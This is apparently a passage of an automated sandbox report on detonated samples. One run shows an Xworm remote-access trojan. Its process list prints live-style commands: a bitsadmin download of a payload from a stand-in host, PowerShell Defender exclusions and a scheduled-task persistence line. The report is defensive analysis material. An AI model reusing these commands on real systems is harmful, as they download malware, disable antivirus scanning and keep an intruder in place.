US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win10v2004-20240802-en

Max time kernel

415s

Max time network

423s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Network

Country Destination Domain Proto
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:29

Platform

win10v2004-20240802-en

Max time kernel

434s

Max time network

437s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.WindowsForms.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:37

Platform

win10v2004-20240802-en

Max time kernel

597s

Max time network

425s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Output.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\Output.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2596 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 2596 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 940 wrote to memory of 208 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 940 wrote to memory of 208 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 940 wrote to memory of 208 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 208 wrote to memory of 4220 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 208 wrote to memory of 4220 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 208 wrote to memory of 4220 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 208 wrote to memory of 412 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 208 wrote to memory of 412 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 412 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 412 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

C:\Users\Admin\AppData\Roaming\Output.exe

"C:\Users\Admin\AppData\Roaming\Output.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp

Files

memory/2596-0-0x00007FFEAD683000-0x00007FFEAD685000-memory.dmp

memory/2596-1-0x00000000005E0000-0x00000000005EE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Output.exe

MD5 a731d63dc3edd963b906d0f861f7119c
SHA1 378d5339f1b675e98c81f4446f9e9ad81bc9da9f
SHA256 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad
SHA512 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/940-15-0x0000000000B00000-0x0000000000B0C000-memory.dmp

memory/940-18-0x00007FFEAD680000-0x00007FFEAE141000-memory.dmp

memory/940-19-0x00007FFEAD680000-0x00007FFEAE141000-memory.dmp

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 f27fe2354ebb52cffbb3a8cf66c6bdb3
SHA1 439ce7924db3f534a14d78470c57c98e397969ee
SHA256 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4
SHA512 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f

memory/412-21-0x0000000000040000-0x0000000000050000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfvlerlr.cle.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2488-22-0x000001D567E00000-0x000001D567E22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3072fa0040b347c3941144486bf30c6f
SHA1 e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256 da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA512 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 f065a5f352973e89b2e8d3efd79b98f8
SHA1 6a9a84e0a11010262ea35790fcdf824193805c76
SHA256 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405
SHA512 b920e46653ec87748767e71e88593db3c6d25fcde1b63504a1718d438e383c15578fd9e5bae5665b040e0f3512566ec99322eb8f3b5a0fa2112934ad486a2006

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:27

Platform

win10v2004-20240802-en

Max time kernel

430s

Max time network

434s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 24.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:31

Platform

win7-20240704-en

Max time kernel

359s

Max time network

362s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:32

Platform

win10v2004-20240802-en

Max time kernel

417s

Max time network

420s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A